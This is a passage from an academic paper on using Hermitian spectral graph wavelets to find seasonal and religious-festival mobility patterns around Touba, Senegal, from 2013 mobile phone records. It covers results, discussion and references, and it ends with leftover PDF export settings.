Thus the values of ||ψsn,z|| 2 serve to indicate the relative importance of each scale with respect to the vertex z. In this way, large values of ||ψsn,z|| 2 correspond to the major scales of importance at the node z. We utilize this intuition and define the dominant scale at each vertex to be Sðz; tÞ ¼ arg maxsnkcsn;zk 2 (2) This measures the scale at which a given vertex is most well-connected to the rest of the network. The above Hermitian graph wavelet functions yield a multiscale analysis at each vertex in the graph (i.e., for every cell tower in Senegal). To highlight the ability of spectral graph wavelets to identify multiscale patterns, we chose to build our wavelets with a fixed base point at the vertex corresponding to the city of Touba (denoted xT), and track the scale of the dominant wavelet function S(xT,t) as above, through time. We abbreviate this as S(t). We thus obtain a sequence of dominant wavelet functions on the network ψS(t),xT(t,y), where the first argument indicates the dependance on the changing network structure encoded in A(t) and the second argument y corresponds to vertices of the graph on which the function takes its values. RESULTS To demonstrate the utility of spectral graph wavelets for identifying the main spatio-temporal scales and patterns of human mobility, we calculated dominant wavelet functions centered on Touba, the market city in Senegal’s central breadbasket and an important site for religious festivals, and compared results with those produced from a basic analysis of the original population flow data. More specifically, for any given day, human mobility to/from a given location can be extracted from the mobilitymatrices A(t) and visually inspected (Fig. 2A). Doing so for Touba, one finds that large cities such as Dakar on the west coast account for most of the total daily flow in and out of Touba (i.e., compare the location of large red nodes in Fig. 2A). In contrast, Fig. 2B depicts the dominant wavelet function for the same day as plotted in Fig. 2A. The function ψS(t),xT(t,y) revealsa distinct spatial pattern, with a large positive value centered on Touba, that rapidly diminishes to negative values in surrounding nodes, before approaching zero at geographically remote nodes. We note that despite the fact that the wavelet function was calculated using only the population flow data, and not any explicit spatial distance between location pairs, the dependance of human traffic on the Watson et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.276 7/17 http://dx.doi.org/10.7717/peerj-cs.276 https://peerj.com/computer-science/ distance traveled (i.e., the proximity of Touba to other locations) is apparent in the resulting wavelet function. In other words, we are observing a strong spatial autocorrelation in human mobility levels, which is both intuitive and expected. Figure 2 (A) Cell-towers (i.e., human mobility nodes) in Senegal color coded by the log10 number of people moving to/from Touba on a random day in 2013, and sized by local population density. (B) In contrast, colors now denote the dominant wavelet function centered on Touba for the same day. Here, node size remains proportional to local population density. The two maps reveal very differ- ent information. In (A) mobility to/from the major urban hubs, such as Dakar the capital, are identified and in (B) the shape of the dominant wavelet function is highlighted: wavelet function values are positive at Touba (the large red node near the center of Senegal) decreasing to large negative values in nearby towns, before becoming less negative at far-off towns). Full-size DOI: 10.7717/peerj-cs.276/fig-2 Watson et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.276 8/17 http://dx.doi.org/10.7717/peerj-cs.276/fig-2 http://dx.doi.org/10.7717/peerj-cs.276 https://peerj.com/computer-science/ To characterize changes in human mobility through time, focusing on Touba, we first examined changes in the total traffic to/from Touba over time (Fig. 3A); this is calculated by summing the mobility values to/from Touba at all locations for each day (i.e., taking a row-sum of a given affinity matrix A(t)). Log10 total mobility to/from Touba over time reveals a variety of qualitative features, most striking is a large peak in traffic corresponding to the commemoration of Touba’s mosque’s 50th anniversary, which occurred May 30th, 2013 (day 150), as well as the end of Ramadan August 7th, 2013 (day 219) and Eid al-Adha on October 15 (day 287). We then clustered days based upon origin-destination flow values in A(t). For each day the vector of mobility values to/from Touba were extracted from the mobility matrices A(t). We clustered days based on these values, using the Louvain method for community detection (Blondel et al., 2008). This involved calculating the Euclidean distance Figure 3 (A) Time-series of the log10 total mobility to/from Touba for 2013, colored by group ID produced from clustering days based on their mobility values. This cluster analysis identifies mobility associated with the dry (green) and wet (blue) seasons (with an transitionary phase in gray), and there are peaks in total traffic to/from Touba that correspond with major religious events at day 150, 219 and 287; however, the cluster analysis does not recognize these events as distinct. (B) In contrast, changes over time in the scale associated with the dominant wavelet function (centered on Touba) better reveals the punc- tuated and large-scale mobility events related to religious celebrations (vertical red lines) and Senegal’s independence day (blue vertical line). In addition, using these dominant wavelet functions to cluster days extracts meaningful information about seasonal migration (points in green and blue), as well as the short- term/large-spatial scale events (points in gray). Full-size DOI: 10.7717/peerj-cs.276/fig-3 Watson et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.276 9/17 http://dx.doi.org/10.7717/peerj-cs.276/fig-3 http://dx.doi.org/10.7717/peerj-cs.276 https://peerj.com/computer-science/ between days based on their mobility values, and running the algorithm numerous times because it is non-deterministic. We chose the Louvain method primarily because it provides an objective determination of the number of clusters. This is in contrast to other common clustering approaches which require the number of clusters to be chosen (e.g., k-means). A sensitivity test of the Louvain method, as well as other community detection/clustering approaches is provided in the Supplemental Material. Clustering these mobility data for Touba identified two main time periods, corresponding to seasonal changes in the Senegalese weather and agriculture, as the rainy season begins around September. There is a third cluster corresponding to a short intermediate period (see Fig. 3A, changes in the marker color: green, gray and blue correspond to the dry, intermediate and wet seasons respectively). Interestingly, the clustering only picked out these long-term changes in mobility, and not the short-punctuated events relating to religious festivals or political events. This is because while these kinds of short-term events are associated with a change in total traffic to/from Touba, any topological changes in the inter-city traffic profile are obscured by the complexity and irregularity of the data. In contrast to these results created by analyzing the raw mobility values, clustering dominant wavelet functions over time revealed more nuanced information about mobility in Senegal in 2013. Clustering was done using ψS(t),xT(t,y) in place of population flow values: we calculated the Euclidean distance between daily pairs of Touba-centered wavelet functions, before using the Louvain community detection algorithm to identify clusters. Like the analysis of the relative population flow values described above, this clustering of daily wavelet functions identifies changes in human mobility relating to the dry and wet season. Importantly however, now the presence of relatively short-term and large-scale events were identified throughout the year. These events are marked by a short-term widening of the wavelet function centered on Touba (in network space), and correspond to the three religious migration events listed above. In addition, other events are identified: the Maouloud/Gamou celebration that occurred on January 23, 2013 (day 23) and Independence Day that occurred April 4th, 2013 (day 94). There are two extra events that this clustering approach identified, around day 50 and at the end of the year. The former is an unknown event; the authors do not know of any political, religious, or cultural gathering that occurred near Touba at that time, though we note that the absence of evidence is not evidence of absence. Indeed, the similarity of the network structure at day 50 to that of other verified major migrations is a strong motivator for further investigation. The latter date, at the end of the year, is likely associated with new-years celebrations/holidays. Crucially, the total traffic to/from Touba does not change during many of these events, and they are not identified by clustering the relative population flow data; the scale of the dominant wavelet functions fluctuate due to changes in connectivity within the network and this manages to distinguish between typical traffic patterns and migration events. Averaging the daily wavelet functions associated with each cluster (i.e., producing an average dominant wavelet function centered on Touba for the dry and wet seasons, and for each short-term/large-scale event) reveals stark spatial differences (Fig. 4). For example, the absolute difference between the average wavelet function relating to the dry and wet Watson et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.276 10/17 http://dx.doi.org/10.7717/peerj-cs.276#supplemental-information http://dx.doi.org/10.7717/peerj-cs.276 https://peerj.com/computer-science/ seasons (Fig. 4A) identifies change in several coastal towns (along with changes in mobility in and around Touba). These changes reflect two processes. First, in Senegal there is a large and mobile agricultural work-force. Seasonally employed farm laborers from the coast use Touba as a stepping stone to rural locations in the interior of the country. Second and also associated with the start of the rainy season are floods, and in 2013 the coast experienced significant flooding. These differences in the average wavelet functions associated with the dry and wet clusters also reflect the impact of the floods on human mobility. Additional nuances emerge in the punctuated modes of mobility associated with the religious festivals noted earlier. In contrast to the seasonal changes in mobility, the absolute difference between the average wavelet function associated with short-term/large-scale events, in this case Eid al-Adha on October 15 (day 287), and the wet season identifies change in mobility to/from many small rural towns in the far east of Senegal (Fig. 4B). These differences in average dominant wavelet functions clearly identify the long-distance travel that people make as they go to/from Touba for the religious event. This kind of geographically meaningful information can be used to explore differences in the various modes of human mobility found by clustering daily wavelet functions. In general, this approach more readily reveals heterogenous spatial and network features, relative to results produced from the analysis of the relative population mobility values, which simply described major seasonal changes in flows to/from Touba. Importantly, it bears noting that while we present results from Touba, the spectral graph wavelet analysis also characterizes the main spatio-temporal scales and patterns of human mobility for every node within the network. Hence, while we have demonstrated its utility with regards Figure 4 Main spatio-temporal patterns of human mobility can be identified by averaging the dominant wavelet functions associated with the cluster groups shown in Fig. 3B. Then, these modes of human mobility can be compared by calculating their absolute difference and plotting as a map. (A) The absolute difference in the average dominant wavelet function (centered on Touba) associated with the dry and wet seasons highlights changes in mobility to/from the coast and Touba. (B) The absolute difference in the average wavelet function (centered on Touba) associated with religious events and the wet season reveals changes in mobility in far-off towns in the east of Senegal, and Touba. Full-size DOI: 10.7717/peerj-cs.276/fig-4 Watson et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.276 11/17 http://dx.doi.org/10.7717/peerj-cs.276/fig-4 http://dx.doi.org/10.7717/peerj-cs.276 https://peerj.com/computer-science/ to Touba, there is additional spatially meaningful information that we did not show or analyze. DISCUSSION To improve upon current abilities to characterize changes in human mobility over time we developed and applied a new manifold learning method based on spectral graph wavelets (i.e., Hermitian graph wavelets) to a CDR dataset. These data describe the origin-destination mobility patterns for people living in Senegal, daily for the year 2013. Our approach is non-linear, localized and scale explicit, that is it can be used to identify multiscale patterns of human mobility for each node in a mobility network. This is key to disentangling multiscale patterns with big and rich datasets like those produced by CDRs. Spectral graph wavelets applied to these data allowed us to identify seasonal changes in Senegalese human mobility, as well as punctuated large-scale events relating to religious migration and a national holiday. These short-term but large-spatial-scale events were not identified by a standard approach applied to the original mobility values themselves (i.e., A(t)), because these data contained too much noise. As a consequence, our spectral graph wavelets approach provides a new method for the multiscale decomposition of human mobility data, and expands the utility of CDR data for anticipating and preparing for changes in human mobility. Identifying the main spatio-temporal scale and patterns of human mobility, and the spatio-temporal scales at which they occur, is an important part of developing policies for a whole host of operations, ranging from traffic infrastructure to disaster response planning (Jiang, Ferreira & Gonzalez, 2017). These kinds of spatial policies have previously been made using far coarser data, both spatially and temporally (Bell & Ward, 2000). Here, making use of relatively high resolution CDR data, we were able to tease out the spatial signal of punctuated large-scale events, in contrast to a standard approach applied to data on population flow values. The rate at which new data is created—always at higher temporal frequency and greater spatial resolution—is ever growing, and the quantitative tools used to extract useful information from monthly or even annual datasets are rapidly diminishing in utility (Lee & Kang, 2015). For the best use of these new data (i.e., next-gen CDR datasets) new tools are required, and indeed, new tools that can articulate the complex and adaptive nature of human mobility have extreme utility (Scheffer et al., 2018). Like human mobility, other complex adaptive systems are multiscale by nature (Levin, 1998), and in general there is a growing need to extract information about the micro-scale agents that comprise these systems, from which meso- and macro-scale patterns emerge (Folke, 2006). Data-analytic tools designed with the multiscale nature of complex adaptive systems in mind will help policy makers develop plans that explicitly account for the emergence of patterns over a continuum of scales, like in this case the various modes of human mobility in Senegal, and their associated network/geographic scale. The use of spectral graph wavelets allowed us to essentially transform the origin- destination mobility data (i.e., A(t)) to a form that better highlights the differences of human mobility patterns. In that spirit, this analysis can be thought of as a process of dimensional reduction or a denoising of the raw data, in a manner that accounts explicitly Watson et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.276 12/17 http://dx.doi.org/10.7717/peerj-cs.276 https://peerj.com/computer-science/ for network scale. Analyzing the mobility data did not provide the same kinds of scale- dependent information because it is noisy. Admittedly, when analyzing the mobility matrices A(t) we used a very basic approach to classification. There are indeed many other more sophisticated approaches that we could have been employed, in order to contrast with the results produced from analysis of the dominant wavelets functions. These approaches vary from traditional dimensional reduction techniques that rely on linear correlations, such as Principal Components Analysis (PCA), to machine learning approaches for feature identification (Bi et al., 2003). Indeed, we see that there is a great opportunity for using the wavelet transformed data in combination with machine learning approaches to classification and feature extraction. The multiscale and localized information that spectral graph wavelets provides can be used in many other ways. Here, we have analyzed human mobility information gained from the CDR data, but the CDR dataset can also be used to construct human communication networks through time. Performing the same analysis on both sets of data would produce concurrent wavelet functions through time. A comparison of changes in the main spatio-temporal scales and models of human communication and mobility might reveal early-warning signals of migration/displacement. Simply put, as people prepare to move they are likely to call their ultimate destination, and this information can help policy makers prepare for changes in population density at specific nodes/places. There is an opportunity to utilize methods from manifold matching (Shen, Vogelstein & Priebe, 2017) to make these comparisons. Manifold matching has been used in image recognition to match photos of the same person, for example. Here, instead of a set of photos from a person’s face, the manifolds that would be compared are those associated with a complex system (the Senegal cellular network) described in two ways (i.e., communications and mobility). Early detection of large-scale human migration is evident in our analysis. For example in Fig. 3B, the days with large wavelet scale (i.e., the gray dots) often precede the date of the event (i.e., the vertical red lines). This suggest that our method could provide quantitative measures of “anomalous” mobility patterns associated with these events. For example, one could compare a given day’s dominant wavelet function with those from an average wavelet function constructed from the preceding week or month. This is similar to, but contrasts with, what we have done here comparing seasonal patterns of mobility. In doing so, one could compute how anomalous a given day is relative to recent times. This approach to anomaly detection is common, but the use of our HGW method to predict unknown oncoming events from CDR data would be novel. Additional early-warning signals of mass human-mobility can also be sought from the dynamics inherent to mobility networks alone. These kinds of early-warning signals come from dynamical systems and bifurcation theory (Scheffer et al., 2009) and are measured by changes in the variance and autocorrelation in macroscopic variables (Boettiger, Ross & Hastings, 2013), for example changes in the density of people in a certain neighborhood. For human mobility CDR data, there is an opportunity to advance new early- warning signals of multiscale change using manifold learning. Specifically, spectral graph wavelets is one way to learn changes in the geometry of the manifold on which dynamics Watson et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.276 13/17 http://dx.doi.org/10.7717/peerj-cs.276 https://peerj.com/computer-science/ occur, but there are others, for example diffusion maps (Coifman & Lafon, 2006) and Laplacian eigenmaps (Belkin & Niyogi, 2003). Systems undergoing a bifurcation driven by some macroscopic variable should a fortiori exhibit changes in geometry at small and intermediate scales as well; a multiscale analysis may then allow one to directly address how these kinds of large and abrupt changes in complex systems are related to changes in the behavior of micro-scale agents (i.e. in this case, how individual people move from place to place). Identifying the main spatio-temporal scales and patterns of human mobility, and potentially early-warning signals of changes between them, is of principal interest of groups tasked with managing human communities (Jiang, Ferreira & Gonzalez, 2017), as they go about their everyday lives as well as respond to infrequent but impactful events like a natural hazard. In Senegal, flooding is a persistent problem and indeed in 2013 the capital Dakar was severely hit. These kinds of events can lead to the permanent displacement of people from their homes, and similarly to identifying the main spatio-temporal scales and patterns of human mobility as done here, there is value to identifying where and when this displacement occurs (Xie et al., 2016). Indeed, displacement is not necessarily instantaneous with regards to the perturbation, but it may take a relatively long time for people to “realize” their displacement (Black et al., 2013). Multiscale methods like spectral graph wavelets applied to CDR data can help distinguish these additional modes of human mobility, and further, methods from manifold matching are likely to be useful too. In sum, we have made advances to spectral graph wavelets (specifically Hermitian graph wavelets) for analyzing CDR human mobility data. Our approach extracts useful information that is localized and scale-explicit, and we identified seasonal changes in human mobility as well as punctuated large-scale mobility events associated with religious celebrations and a national holiday. Here, we focused our multiscale analysis on one place in Senegal—Touba: a place of religious significance. However, the spectral graph wavelets analysis produces information for all nodes in the network, and there is rich vein of scale-explicit information in the full wavelet transform of the origin-destination mobility data. Last, while the growth in data obtained for complex adaptive systems is daunting (Scheffer et al., 2009), there are opportunities to employ new localized and scale-explicit dimensional reduction techniques, like we have done so here, to greatly improve our ability to characterize and predict multiscale change. This ability is vital if we are to maintain welfare from the complex systems in which we are embedded. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received funding from the DARPA Young Faculty Award 339 YFA N66001- 17-1-4038. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: DARPA Young Faculty Award: 339 YFA N66001-17-1-4038. Watson et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.276 14/17 http://dx.doi.org/10.7717/peerj-cs.276 https://peerj.com/computer-science/ Competing Interests The authors declare that they have no competing interests. Author Contributions � James R. Watson conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Zach Gelbaum conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. � Mathew Titus conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. � Grant Zoch performed the experiments, authored or reviewed drafts of the paper, and approved the final draft. � David Wrathall conceived and designed the experiments, performed the experiments, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: Data available as a Supplemental File. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.276#supplemental-information. REFERENCES Balcan D, Colizza V, Gonçalves B, Hu H, Ramasco JJ, Vespignani A. 2009. Multiscale mobility networks and the spatial spreading of infectious diseases. Proceedings of the National Academy of Sciences of the United States of America 106(51):21484–21489 DOI 10.1073/pnas.0906910106. Barbosa H, Barthelemy M, Ghoshal G, James CR, Lenormand M, Louail T, Menezes R, Ramasco JJ, Simini F, Tomasini M. 2018. Human mobility: models and applications. Physics Reports 734:1–74 DOI 10.1016/j.physrep.2018.01.001. Becker RA, Caceres R, Hanson K, Loh JM, Urbanek S, Varshavsky A, Volinsky C. 2011. A tale of one city: using cellular network data for urban planning. IEEE Pervasive Computing 10(4):18–26 DOI 10.1109/MPRV.2011.44. Belik V, Geisel T, Brockmann D. 2011. Natural human mobility patterns and spatial spread of infectious diseases. Physical Review X 1(1):011001 DOI 10.1103/PhysRevX.1.011001. Belkin M, Niyogi P. 2003. Laplacian eigenmaps for dimensionality reduction and data representation. Neural computation 15(6):1373–1396 DOI 10.1162/089976603321780317. Bell M, Ward G. 2000. Comparing temporary mobility with permanent migration. Tourism Geographies 2(1):87–107 DOI 10.1080/146166800363466. Bi J, Bennett K, Embrechts M, Breneman C, Song M. 2003. Dimensionality reduction via sparse support vector machines. Journal of Machine Learning Research 3(March):1229–1243. Watson et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.276 15/17 http://dx.doi.org/10.7717/peerj-cs.276#supplemental-information http://dx.doi.org/10.7717/peerj-cs.276#supplemental-information http://dx.doi.org/10.7717/peerj-cs.276#supplemental-information http://dx.doi.org/10.1073/pnas.0906910106 http://dx.doi.org/10.1016/j.physrep.2018.01.001 http://dx.doi.org/10.1109/MPRV.2011.44 http://dx.doi.org/10.1103/PhysRevX.1.011001 http://dx.doi.org/10.1162/089976603321780317 http://dx.doi.org/10.1080/146166800363466 http://dx.doi.org/10.7717/peerj-cs.276 https://peerj.com/computer-science/ Black R, Arnell NW, Adger WN, Thomas D, Geddes A. 2013. Migration, immobility and displacement outcomes following extreme events. Environmental Science & Policy 27:S32–S43 DOI 10.1016/j.envsci.2012.09.001. Blondel VD, Guillaume J-L, Lambiotte R, Lefebvre E. 2008. Fast unfolding of communities in large networks. Journal of Statistical Mechanics: Theory and Experiment 2008(10):P10008 DOI 10.1088/1742-5468/2008/10/P10008. Boettiger C, Ross N, Hastings A. 2013. Early warning signals: the charted and uncharted territories. Theoretical Ecology 6(3):255–264 DOI 10.1007/s12080-013-0192-6. Calabrese F, Diao M, Lorenzo GD, Ferreira J, Ratti C. 2013. Understanding individual mobility patterns from urban sensing data: a mobile phone trace example. Transportation Research Part C: Emerging Technologies 26:301–313 DOI 10.1016/j.trc.2012.09.009. Chen CP, Zhang C-Y. 2014. Data-intensive applications, challenges, techniques and technologies: a survey on big data. Information Sciences 275:314–347 DOI 10.1016/j.ins.2014.01.015. Chung FRK. 1997. Spectral graph theory, CBMS Regional Conference Series in Mathematics. Vol. 92. Rhode Island: American Mathematical Society. Coifman RR, Lafon S. 2006. Diffusion maps. Applied and Computational Harmonic Analysis 21(1):5–30 DOI 10.1016/j.acha.2006.04.006. Dobra A, Williams NE, Eagle N. 2015. Spatiotemporal detection of unusual human population behavior using mobile phone data. PLOS ONE 10(3):1–20. Dong X, Ortega A, Frossard P, Vandergheynst P. 2013. Inference of mobility patterns via spectral graph wavelets. In: 2013 IEEE International Conference on Acoustics, Speech and Signal Processing, 3118–3122. Folke C. 2006. Resilience: the emergence of a perspective for social-ecological systems analyses. Global Environmental Change 16(3):253–267 DOI 10.1016/j.gloenvcha.2006.04.002. Gelbaum Z, Titus M, Watson J. 2019. Multi-scale analysis on complex networks using hermitian graph wavelets. Available at http://arxiv.org/abs/1901.07051. Giannotti F, Nanni M, Pedreschi D, Pinelli F, Renso C, Rinzivillo S, Trasarti R. 2011. Unveiling the complexity of human mobility by querying and mining massive trajectory data. International Journal on Very Large Data Bases 20(5):695–719 DOI 10.1007/s00778-011-0244-8. Hammond DK, Vandergheynst P, Gribonval R. 2011. Wavelets on graphs via spectral graph theory. Applied and Computational Harmonic Analysis 30(2):129–150 DOI 10.1016/j.acha.2010.04.005. Iqbal MS, Choudhury CF, Wang P, Gonzalez MC. 2014. Development of original destination matrices using mobile phone call data. Transportation Research Part C: Emerging Technologies 40:63–74 DOI 10.1016/j.trc.2014.01.002. Jarv O, Ahas R, Witlox F. 2014. Understanding monthly variability in human activity spaces: a twelve-month study using mobile phone call detail records. Transportation Research Part C: Emerging Technologies 38:122–135 DOI 10.1016/j.trc.2013.11.003. Jiang S, Ferreira J, Gonzalez MC. 2017. Activity-based human mobility patterns inferred from mobile phone data: a case study of Singapore. IEEE Transactions on Big Data 3(2):208–219 DOI 10.1109/TBDATA.2016.2631141. Lambiotte R, Blondel VD, De Kerchove C, Huens E, Prieur C, Smoreda Z, Dooren PV. 2008. Geographical dispersal of mobile communication networks. Physica A: Statistical Mechanics and its Applications 387(21):5317–5325 DOI 10.1016/j.physa.2008.05.014. Lee J-G, Kang M. 2015. Geospatial big data: challenges and opportunities. Big Data Research 2(2):74–81 DOI 10.1016/j.bdr.2015.01.003. Watson et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.276 16/17 http://dx.doi.org/10.1016/j.envsci.2012.09.001 http://dx.doi.org/10.1088/1742-5468/2008/10/P10008 http://dx.doi.org/10.1007/s12080-013-0192-6 http://dx.doi.org/10.1016/j.trc.2012.09.009 http://dx.doi.org/10.1016/j.ins.2014.01.015 http://dx.doi.org/10.1016/j.acha.2006.04.006 http://dx.doi.org/10.1016/j.gloenvcha.2006.04.002 http://arxiv.org/abs/1901.07051 http://dx.doi.org/10.1007/s00778-011-0244-8 http://dx.doi.org/10.1016/j.acha.2010.04.005 http://dx.doi.org/10.1016/j.trc.2014.01.002 http://dx.doi.org/10.1016/j.trc.2013.11.003 http://dx.doi.org/10.1109/TBDATA.2016.2631141 http://dx.doi.org/10.1016/j.physa.2008.05.014 http://dx.doi.org/10.1016/j.bdr.2015.01.003 http://dx.doi.org/10.7717/peerj-cs.276 https://peerj.com/computer-science/ Levin SA. 1998. Ecosystems and the biosphere as complex adaptive systems. Ecosystems 1(5):431–436 DOI 10.1007/s100219900037. Lu X, Bengtsson L, Holme P. 2012. Predictability of population displacement after the 2010 haiti earthquake. Proceedings of the National Academy of Sciences of the United States of America 109(29):11576–11581 DOI 10.1073/pnas.1203882109. Lu X, Wrathall DJ, Sundsøy PR, Nadiruzzaman M, Wetter E, Iqbal A, Qureshi T, Tatem A, Canright G, Engaz-Monsen K, Bengtsson L. 2016. Unveiling hidden migration and mobility patterns in climate stressed regions: a longitudinal study of six million anonymous mobile phone users in Bangladesh. Global Environmental Change 38:1–7 DOI 10.1016/j.gloenvcha.2016.02.002. Mohan DM, Asif MT, Mitrovic N, Dauwels J, Jaillet P. 2014. Wavelets on graphs with application to transportation networks. In: 17th International IEEE Conference on Intelligent Transportation Systems (ITSC), 1707–1712. Phithakkitnukoon S, Smoreda Z, Olivier P. 2012. Socio-geography of human mobility: a study using longitudinal mobile phone data. PLOS ONE 7(6):1–9. Scheffer M, Bascompte J, Brock WA, Brovkin V, Carpenter SR, Dakos V, Held H, Van Nes EH, Rietkerk M, Sugihara G. 2009. Early-warning signals for critical transitions. Nature 461(7260):53–59 DOI 10.1038/nature08227. Scheffer M, Bolhuis JE, Borsboom D, Buchman TG, Gijzel SMW, Goulson D, Kammenga JE, Kemp B, Van de Leemput IA, Levin S, Martin CM, Melis RJF, Van Nes EH, Romero LM, Olde Rikkert MGM. 2018. Quantifying resilience of humans and other animals. Proceedings of the National Academy of Sciences of the United States of America 115(47):11883–11890 DOI 10.1073/pnas.1810630115. Shen C, Vogelstein JT, Priebe CE. 2017. Manifold matching using shortest-path distance and joint neighborhood selection. Pattern Recognition Letters 92:41–48 DOI 10.1016/j.patrec.2017.04.005. Simini F, Gonzalez MC, Maritan A, Barabasi A-L. 2012. A universal model for mobility and migration patterns. Nature 484(7392):96–100 DOI 10.1038/nature10856. Song C, Koren T, Wang P, Barabasi A-L. 2010a. Modelling the scaling properties of human mobility. Nature Physics 6(10):818–823 DOI 10.1038/nphys1760. Song C, Qu Z, Blumm N, Barabasi A-L. 2010b. Limits of predictability in human mobility. Science 327(5968):1018–1021 DOI 10.1126/science.1177170. Tremblay N, Borgnat P. 2013. Multiscale community mining in networks using spectral graph wavelets. In: 21st European Signal Processing Conference (EUSIPCO 2013). 1–5. Wesolowski A, Buckee CO, Bengtsson L, Wetter E, Lu X, Tatem AJ. 2014a. Commentary: containing the ebola outbreak—the potential and challenge of mobile network data. PLOS Currents 6:1–20. Wesolowski A, Stresman G, Eagle N, Stevenson J, Owaga C, Marube E, Bousema T, Drakeley C, Cox J, Buckee CO. 2014b. Quantifying travel behavior for infectious disease research: a comparison of data from surveys and mobile phones. Scientific Reports 4:1–7. Widhalm P, Yang Y, Ulm M, Athavale S, Gonzalez MC. 2015. Discovering urban activity patterns in cell phone data. Transportation 42(4):597–623 DOI 10.1007/s11116-015-9598-x. Xie M, Neal J, Burke M, Lobell D, Ermon S. 2016. Transfer learning from deep features for remote sensing and poverty mapping. Available at http://arxiv.org/abs/1510.00098. Watson et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.276 17/17 http://dx.doi.org/10.1007/s100219900037 http://dx.doi.org/10.1073/pnas.1203882109 http://dx.doi.org/10.1016/j.gloenvcha.2016.02.002 http://dx.doi.org/10.1038/nature08227 http://dx.doi.org/10.1073/pnas.1810630115 http://dx.doi.org/10.1016/j.patrec.2017.04.005 http://dx.doi.org/10.1038/nature10856 http://dx.doi.org/10.1038/nphys1760 http://dx.doi.org/10.1126/science.1177170 http://dx.doi.org/10.1007/s11116-015-9598-x http://arxiv.org/abs/1510.00098 http://dx.doi.org/10.7717/peerj-cs.276 https://peerj.com/computer-science/ Identifying multiscale spatio-temporal patterns in human mobility using manifold learning Introduction Methods Results Discussion References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS /CHT 